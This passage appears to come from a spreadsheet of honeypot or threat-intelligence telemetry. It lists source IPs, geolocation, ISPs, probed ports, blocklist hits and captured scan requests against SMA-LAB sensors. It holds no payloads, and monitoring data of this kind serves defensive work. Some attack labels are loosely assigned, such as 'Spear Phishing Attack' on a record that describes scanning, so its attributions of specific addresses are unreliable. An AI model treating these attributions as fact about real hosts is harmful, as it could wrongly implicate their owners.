    <t>::ffff:a87e:ffae</t>
  </si>
  <si>
    <t>4ee38757c88f5ab2048558641253a614</t>
  </si>
  <si>
    <t>14.102.189.241</t>
  </si>
  <si>
    <t>28.8945</t>
  </si>
  <si>
    <t>76.5892</t>
  </si>
  <si>
    <t>137120</t>
  </si>
  <si>
    <t>Nas Internet Services Private Limited</t>
  </si>
  <si>
    <t>IAXN Telecom Pvt. Ltd.</t>
  </si>
  <si>
    <t>IAXN</t>
  </si>
  <si>
    <t>::ffff:e66:bdf1</t>
  </si>
  <si>
    <t>f7e8165c4d8498fc232fa62202b60d49</t>
  </si>
  <si>
    <t>181.212.70.37</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>7500000</t>
  </si>
  <si>
    <t>-33.4368</t>
  </si>
  <si>
    <t>-70.6322</t>
  </si>
  <si>
    <t>16629</t>
  </si>
  <si>
    <t>CTC. CORP S.A. (TELEFONICA EMPRESAS)</t>
  </si>
  <si>
    <t>Telefonica Empresas Chile SA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,63143)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59650)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59762)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,58146)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,58599)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,52055)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,52144)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59534)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,59790)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (181.212.70.37,53091)}</t>
  </si>
  <si>
    <t>::ffff:b5d4:4625</t>
  </si>
  <si>
    <t>540ce2753d571a2076e2e0382196aeae</t>
  </si>
  <si>
    <t>120.61.166.131</t>
  </si>
  <si>
    <t>::ffff:783d:a683</t>
  </si>
  <si>
    <t>89830ebe4fa2aa4ad7dc1b93131a0b1d</t>
  </si>
  <si>
    <t>120.56.85.2</t>
  </si>
  <si>
    <t>Mayiladuthurai</t>
  </si>
  <si>
    <t>Sīrkāzhi</t>
  </si>
  <si>
    <t>1256075</t>
  </si>
  <si>
    <t>11.2373</t>
  </si>
  <si>
    <t>79.7358</t>
  </si>
  <si>
    <t>::ffff:7838:5502</t>
  </si>
  <si>
    <t>8e3cd6d2c9033ed9286ee6ca75d502ad</t>
  </si>
  <si>
    <t>113.180.19.111</t>
  </si>
  <si>
    <t>5900&amp;&amp;23541&amp;&amp;64308</t>
  </si>
  <si>
    <t>36</t>
  </si>
  <si>
    <t>Ninh Thuận Province</t>
  </si>
  <si>
    <t>Thành Phố Phan Rang-Tháp Chàm</t>
  </si>
  <si>
    <t>Phan Rang</t>
  </si>
  <si>
    <t>1571067</t>
  </si>
  <si>
    <t>11.5826</t>
  </si>
  <si>
    <t>108.991</t>
  </si>
  <si>
    <t>::ffff:71b4:136f</t>
  </si>
  <si>
    <t>The attacker is conducting reconnaissance and scanning activities, attempting to identify vulnerable services and exploit them for malicious purposes. They are also attempting to gain unauthorized access to systems and networks by trying different usernames and passwords.</t>
  </si>
  <si>
    <t>Spear Phishing Attack</t>
  </si>
  <si>
    <t>22cdcb199d6cf8015841ddd5c1ba2897</t>
  </si>
  <si>
    <t>103.213.1.89</t>
  </si>
  <si>
    <t>3306&amp;&amp;1433&amp;&amp;445</t>
  </si>
  <si>
    <t>Erode</t>
  </si>
  <si>
    <t>Bhavāni (Vijaya Thottam)</t>
  </si>
  <si>
    <t>1276037</t>
  </si>
  <si>
    <t>638301</t>
  </si>
  <si>
    <t>11.4396</t>
  </si>
  <si>
    <t>77.6905</t>
  </si>
  <si>
    <t>134877</t>
  </si>
  <si>
    <t>Sri Vari Network Private Limited</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SMB:Incoming connection (103.213.1.89,56490)}&amp;&amp;{Data_SMB:Incoming connection (103.213.1.89,57043)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:67d5:159</t>
  </si>
  <si>
    <t>901d672311d42a2ccbe363b00fd7df30</t>
  </si>
  <si>
    <t>125.195.16.88</t>
  </si>
  <si>
    <t>FL1-125-195-16-88.chb.mesh.ad.jp&amp;&amp;NA</t>
  </si>
  <si>
    <t>Shinagawa</t>
  </si>
  <si>
    <t>1852140</t>
  </si>
  <si>
    <t>35.6103</t>
  </si>
  <si>
    <t>139.748</t>
  </si>
  <si>
    <t>2518</t>
  </si>
  <si>
    <t>BIGLOBE Inc.</t>
  </si>
  <si>
    <t>BIGLOBE</t>
  </si>
  <si>
    <t>::ffff:7dc3:1058</t>
  </si>
  <si>
    <t>49a26d1f9691485acf30c2d893e4cdcd</t>
  </si>
  <si>
    <t>14.63.43.202</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H11&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_MT-CPA_H14&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_HTTP_H12</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;62999&amp;&amp;23&amp;&amp;5530&amp;&amp;60920&amp;&amp;80&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:e3f:2bca</t>
  </si>
  <si>
    <t>035759574a476d08d4cc93c36bac59c0</t>
  </si>
  <si>
    <t>118.36.211.120</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;6379&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:7624:d378</t>
  </si>
  <si>
    <t>7bb16b2500bc89cca2fa72475b55ba09</t>
  </si>
  <si>
    <t>117.247.112.47</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H33&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_HTTPS_H25&amp;&amp;SMA-LAB_MT-CPA_H42&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;50182&amp;&amp;80&amp;&amp;443&amp;&amp;49498&amp;&amp;1433&amp;&amp;3306</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}</t>
  </si>
  <si>
    <t>::ffff:75f7:702f</t>
  </si>
  <si>
    <t>46738d69df1a8dc3f448f642055f0205</t>
  </si>
  <si>
    <t>103.164.114.138</t>
  </si>
  <si>
    <t>::ffff:67a4:728a</t>
  </si>
  <si>
    <t>204c90ae9f479cc75f6031d1d33a9b0e</t>
  </si>
  <si>
    <t>103.212.94.191</t>
  </si>
  <si>
    <t>SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_MYSQL_H13</t>
  </si>
  <si>
    <t>1433&amp;&amp;52935&amp;&amp;3306</t>
  </si>
  <si>
    <t>Konkan Division</t>
  </si>
  <si>
    <t>Mumbai (Grant Road East)</t>
  </si>
  <si>
    <t>18.96</t>
  </si>
  <si>
    <t>72.8175</t>
  </si>
  <si>
    <t>138312</t>
  </si>
  <si>
    <t>Best Telnet Services Private Limited</t>
  </si>
  <si>
    <t>Best telnet services private limited</t>
  </si>
  <si>
    <t>2016-03-29</t>
  </si>
  <si>
    <t>BESTTELNET</t>
  </si>
  <si>
    <t>::ffff:67d4:5ebf</t>
  </si>
  <si>
    <t>8409ebccea9f765993b0c613fa7eff48</t>
  </si>
  <si>
    <t>42.116.69.52</t>
  </si>
  <si>
    <t>31</t>
  </si>
  <si>
    <t>Bình Định Province</t>
  </si>
  <si>
    <t>Phu Cat District</t>
  </si>
  <si>
    <t>Qui Nhon</t>
  </si>
  <si>
    <t>1568574</t>
  </si>
  <si>
    <t>13.7765</t>
  </si>
  <si>
    <t>109.224</t>
  </si>
  <si>
    <t>FPT-STATICIP</t>
  </si>
  <si>
    <t>FPT-STATICIP-NET</t>
  </si>
  <si>
    <t>::ffff:2a74:4534</t>
  </si>
  <si>
    <t>f9ae97a3da768e2d62db2d953a06e6e8</t>
  </si>
  <si>
    <t>117.206.73.53</t>
  </si>
  <si>
    <t>abuse.ch&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:75ce:4935</t>
  </si>
  <si>
    <t>C-U&amp;&amp;C-I</t>
  </si>
  <si>
    <t>7c79581d131f66a740050a6047cb1b2c</t>
  </si>
  <si>
    <t>117.207.174.202</t>
  </si>
  <si>
    <t>::ffff:75cf:aeca</t>
  </si>
  <si>
    <t>3add2e9a23cdc5c639c0334db082b936</t>
  </si>
  <si>
    <t>117.212.58.20</t>
  </si>
  <si>
    <t>::ffff:75d4:3a14</t>
  </si>
  <si>
    <t>02a8cd5dc2d8492192f53edb1f79aaca</t>
  </si>
  <si>
    <t>180.191.36.76</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H23</t>
  </si>
  <si>
    <t>Ilocos</t>
  </si>
  <si>
    <t>Pangasinan</t>
  </si>
  <si>
    <t>Bayambang</t>
  </si>
  <si>
    <t>1725863</t>
  </si>
  <si>
    <t>15.8127</t>
  </si>
  <si>
    <t>120.456</t>
  </si>
  <si>
    <t>::ffff:b4bf:244c</t>
  </si>
  <si>
    <t>c82ed32c17e0a7c31e7e1cdbc55f0a0c</t>
  </si>
  <si>
    <t>168.197.157.202</t>
  </si>
  <si>
    <t>SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>Sarzedo</t>
  </si>
  <si>
    <t>3447969</t>
  </si>
  <si>
    <t>-20.0353</t>
  </si>
  <si>
    <t>-44.1447</t>
  </si>
  <si>
    <t>265485</t>
  </si>
  <si>
    <t>UP NET TELECOM</t>
  </si>
  <si>
    <t>::ffff:a8c5:9dca</t>
  </si>
  <si>
    <t>6936c218574262af6025cb945057f569</t>
  </si>
  <si>
    <t>182.153.75.249</t>
  </si>
  <si>
    <t>2010-03-04</t>
  </si>
  <si>
    <t>SMARTMOBILE-AS-AP</t>
  </si>
  <si>
    <t>::ffff:b699:4bf9</t>
  </si>
  <si>
    <t>98451f7b8dccd9efb12ca6a8c1d44bc9</t>
  </si>
  <si>
    <t>61.0.64.205</t>
  </si>
  <si>
    <t>::ffff:3d00:40cd</t>
  </si>
  <si>
    <t>Portscan &amp;&amp; Scanning Attack</t>
  </si>
  <si>
    <t>66f8b7cb5263dc85d1e49d36ee25c5e9</t>
  </si>
  <si>
    <t>51.254.49.106</t>
  </si>
  <si>
    <t>NA&amp;&amp;ephraim.probe.onyphe.net</t>
  </si>
  <si>
    <t>Untrusted Incomming Traffic&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H11&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_HTTPS_H27&amp;&amp;SMA-LAB_HTTPS_HC1&amp;&amp;SMA-LAB_HTTPS_H24&amp;&amp;SMA-LAB_HTTPS_H31&amp;&amp;SMA-LAB_HTTPS_H40&amp;&amp;SMA-LAB_HTTPS_H34&amp;&amp;SMA-LAB_HTTPS_H16&amp;&amp;SMA-LAB_HTTPS_H44&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_HTTPS_H28&amp;&amp;SMA-LAB_HTTPS_H14&amp;&amp;SMA-LAB_HTTPS_H37&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_HTTPS_H17&amp;&amp;SMA-LAB_HTTPS_H22</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;8443&amp;&amp;63912</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '194.146.12.172', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.250.150.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.118.77', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '103.211.202.140:8443', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '91.194.11.82', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.255.123.181', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '94.131.8.76', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '5.180.55.39', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 'Accept-Language': 'en-US,en;q=0.5', 'Connection': 'close', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>2017-07-25 07:27:12</t>
  </si>
  <si>
    <t>2025-07-25 07:27:12</t>
  </si>
  <si>
    <t>2025-03-21 14:40:42</t>
  </si>
  <si>
    <t>['DNS19.OVH.NET', 'NS19.OVH.NET']</t>
  </si>
  <si>
    <t>OVH, SAS</t>
  </si>
  <si>
    <t>abuse@ovh.net</t>
  </si>
  <si>
    <t>::ffff:33fe:316a</t>
  </si>
  <si>
    <t>96783b3383d152d73ef92284046577eb</t>
  </si>
  <si>
    <t>120.57.124.31</t>
  </si>
  <si>
    <t>10562&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:7839:7c1f</t>
  </si>
  <si>
    <t>4a09de67e4b1c31f9d055cf152c97baf</t>
  </si>
  <si>
    <t>211.197.242.156</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45</t>
  </si>
  <si>
    <t>::ffff:d3c5:f29c</t>
  </si>
  <si>
    <t>9e705273aa0ec8d8ac6f85354146ec87</t>
  </si>
  <si>
    <t>220.119.28.144</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_SSH_H44&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;22&amp;&amp;43707&amp;&amp;43711&amp;&amp;43713&amp;&amp;43714&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:dc77:1c90</t>
  </si>
  <si>
    <t>6daa627ce89603ea3c338479dee8936b</t>
  </si>
  <si>
    <t>220.134.42.117</t>
  </si>
  <si>
    <t>220-134-42-117.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1</t>
  </si>
  <si>
    <t>::ffff:dc86:2a75</t>
  </si>
  <si>
    <t>dbfa3b31b6205fff383fb9f6bf184a27</t>
  </si>
  <si>
    <t>115.244.132.21</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H16&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;59626&amp;&amp;59649&amp;&amp;3306</t>
  </si>
  <si>
    <t>::ffff:73f4:8415</t>
  </si>
  <si>
    <t>4c20ae83a6915185178ec866fae5cbf4</t>
  </si>
  <si>
    <t>43.247.156.202</t>
  </si>
  <si>
    <t>Bengaluru Rural</t>
  </si>
  <si>
    <t>Hoskote</t>
  </si>
  <si>
    <t>1269936</t>
  </si>
  <si>
    <t>13.0707</t>
  </si>
  <si>
    <t>77.7981</t>
  </si>
  <si>
    <t>55947</t>
  </si>
  <si>
    <t>Bangalore Broadband Network Pvt Ltd</t>
  </si>
  <si>
    <t>Bangalore Broadband Network PVT LTD</t>
  </si>
  <si>
    <t>BBNL-IN</t>
  </si>
  <si>
    <t>::ffff:2bf7:9cca</t>
  </si>
  <si>
    <t>a4155182929b2360ad775e9e2d40b60a</t>
  </si>
  <si>
    <t>59.98.199.227</t>
  </si>
  <si>
    <t>::ffff:3b62:c7e3</t>
  </si>
  <si>
    <t>a38bf7cd2e330e538854f962b256056f</t>
  </si>
  <si>
    <t>103.118.190.4</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_POP3_HC1</t>
  </si>
  <si>
    <t>64168&amp;&amp;110</t>
  </si>
  <si>
    <t>{'zen.spamhaus.org': ['unknown'&amp;&amp; 'spam']}</t>
  </si>
  <si>
    <t>Thiruvallur</t>
  </si>
  <si>
    <t>Gummidipundi</t>
  </si>
  <si>
    <t>1270718</t>
  </si>
  <si>
    <t>13.4076</t>
  </si>
  <si>
    <t>80.1088</t>
  </si>
  <si>
    <t>137624</t>
  </si>
  <si>
    <t>Ebenezar Communications Private Limited</t>
  </si>
  <si>
    <t>2018-07-13</t>
  </si>
  <si>
    <t>EBECOMM</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POP3:{'args': '', 'cmd': ''}}</t>
  </si>
  <si>
    <t>::ffff:6776:be04</t>
  </si>
  <si>
    <t>184088bfe85bf8cba27754bafdcd77fb</t>
  </si>
  <si>
    <t>125.161.77.160</t>
  </si>
  <si>
    <t>-6.18362</t>
  </si>
  <si>
    <t>106.825</t>
  </si>
  <si>
    <t>2005-09-02</t>
  </si>
  <si>
    <t>TLKM_D2_BB_SPEEDY_GB</t>
  </si>
  <si>
    <t>::ffff:7da1:4da0</t>
  </si>
  <si>
    <t>78374264d9e19ea32b471b82c4ae3dfc</t>
  </si>
  <si>
    <t>137.59.87.152</t>
  </si>
  <si>
    <t>Cherpulassery</t>
  </si>
  <si>
    <t>8504418</t>
  </si>
  <si>
    <t>10.8765</t>
  </si>
  <si>
    <t>76.3093</t>
  </si>
  <si>
    <t>138754</t>
  </si>
  <si>
    <t>KVBPL-AS-IN</t>
  </si>
  <si>
    <t>Kerala Communicators Cable Limited</t>
  </si>
  <si>
    <t>::ffff:893b:5798</t>
  </si>
  <si>
    <t>b9e212df2bf4a91198c11ec7087dea85</t>
  </si>
  <si>
    <t>27.54.178.153</t>
  </si>
  <si>
    <t>::ffff:1b36:b299</t>
  </si>
  <si>
    <t>556f04e351823eb53b9147624d78fef3</t>
  </si>
  <si>
    <t>5.57.8.235</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SSH_H3&amp;&amp;SMA-LAB_MT-CPA_H41</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;22&amp;&amp;37410&amp;&amp;445</t>
  </si>
  <si>
    <t>8449</t>
  </si>
  <si>
    <t>ElCat Ltd.</t>
  </si>
  <si>
    <t>Elcat</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (5.57.8.235,61935)}&amp;&amp;{Data_SMB:Incoming connection (5.57.8.235,56061)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}</t>
  </si>
  <si>
    <t>::ffff:539:8eb</t>
  </si>
  <si>
    <t>3594def55f0afe79792c7664beb171ac</t>
  </si>
  <si>
    <t>196.188.51.244</t>
  </si>
  <si>
    <t>SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_SMB_H4&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H26&amp;&amp;SMA-LAB_SMB_H26&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H29&amp;&amp;SMA-LAB_MSSQL_H33&amp;&amp;SMA-LAB_SMB_H33&amp;&amp;SMA-LAB_MSSQL_H16&amp;&amp;SMA-LAB_MSSQL_H44&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H36</t>
  </si>
  <si>
    <t>445&amp;&amp;1433&amp;&amp;48752&amp;&amp;23&amp;&amp;NA</t>
  </si>
  <si>
    <t>{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'z.mailspike.net': ['unknown']}</t>
  </si>
  <si>
    <t>9.02497</t>
  </si>
  <si>
    <t>38.7469</t>
  </si>
  <si>
